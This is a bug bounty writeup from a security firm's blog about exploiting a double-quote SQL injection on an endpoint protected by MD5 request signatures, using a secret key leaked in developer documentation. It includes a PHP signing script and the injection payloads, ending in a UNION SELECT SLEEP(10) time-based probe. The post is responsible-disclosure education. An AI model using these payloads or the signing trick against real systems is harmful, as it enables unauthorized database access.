SUDOROOT
Published in

SUDOROOT

[Bug Bounty Writeups] Exploiting SQL Injection Vulnerability

I’m going to share this concise writeup for a bug reported to one of bug bounty programs on hackerone

The bug was a very Straight Forward, but there was an obstacle that could prevent it from being discovered.
the problem was that you need to provide a valid signature for each request you submit.😲

let’s say the endpoint looks like this:

http://site.com/vuln.php?param=1&sig=MD5_HASH

The backend server will first validates the request to see whether a valid signature is provided, then continues and processes the request.
so,
if we need to test that endpoint we first need to know how signatures are calculated,
for this purpose I took a look at the developers’ documentation. i was very lucky that i found the SecretKey used in the generation of MD5 signature leaked in these documentations. 🥳

How signatures are calculated:

signature = md5 ( params_value + SecretKey )

the signature is md5sum of all parameters value concatenated with the SecretKey,

let’s say the SecretKey was “AABBCCDDEEFFGG”

that means, if we need request like this:

vuln.php?param=1111"

then signature must be:

md5 ( 1111" + AABBCCDDEEFFGG)
= md5(1111"AABBCCDDEEFFGG)
= d2d0114df70a4485a8d836efa018b28d

final request looks like:

https://site.com/vuln.php?param=1111"&sig=d2d0114df70a4485a8d836efa018b28d

above request triggered SQL error 😎

🥺🥺🥺🥺🥺🥺🥺

i was asked by the team to dig deeper in exploiting this vulnerability and to provide a POC that result in a 10 seconds delay in the server response 🤐

for that purpose i’ve to try several queries, so i’ve written this very simple php script to save the time that would be spent in signature generation

<?php
$param = urlencode($argv[1]);
$SecretKey = “AABBCCDDEEFFGG”;
$req = “http://site.com/vuln.php?param=".$param."&sig=".md5($param.$SecretKey);
echo file_get_contents($req);
?>

by running the code from the termainal:

$ php exp.php 1"

http://site.com/vuln.php?param=1"&sig=5a8xd71839d8073218e5761025791d2c

gives → MySQL Error 🧐

$ php exp.php 1" ORDER BY 1 — +-

http://site.com/vuln.php?param=1+ORDER+BY+1--%2B-&sig=f8b8cb839d8j33218odi610sq2791d2c
.
.
.etc
.

$ php exp.php 1" UNION SELECT 1,SLEEP(10),3 — +-

http://site.com/vuln.php?param=1+UNION+SELECT+1%2CSLEEP%2810%29%2C3--%2B-&sig=32a097a82139a371bcb6839e0aa103e8
got a 10 seconds delay 😁.

😪😪😪😪

it was double qoute injection, Automated tools will not work in this case since they have no idea about that signature (you can code your own tamper script for sqlmap to automate it).

the bug was submitted to the program, it has CVSS of 10/10 and classified as Critical, the Program paid $2000 for this bug, it was the maximum payout the program could pay that time.

Cheers 🥂

./S3cr3tSDN

--

--

--

SUD0ROOT is an information security firm that helps organizations to identify security risks & weaknesses to meet business and technical security objectives. And also provides organizations with a real-world view of any security issues which may exist, enables you to reduce your

Recommended from Medium

{UPDATE} Mega Zombie Shark Attack Pro Hack Free Resources Generator

Poly Network AMA Events with SpaceY

IOTA Smart Lock — Proof of Concept

Play a game, get Subscribed to my channel - YouTube Clickjacking Bug | #GoogleVRP

LFGrow 2022

Moonlight Lux (LX) Token Sale Recap

Advent of Cyber 3 (2021) Part -1

{UPDATE} Tile Crash Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed ElTijani

Ahmed ElTijani

S3cr3tSDN \n OSWE \n OSCP \n CTF Player \n Bug Bounty Hunter \n SQL injector

More from Medium

Misconfigured Social Login(OAuth) Leads to Permanent account access

SVG based Stored XSS

Cross-Origin Resource Sharing (CORS) Misconfiguration leads to User’s PII leaks.

OTP bypass via response manipulation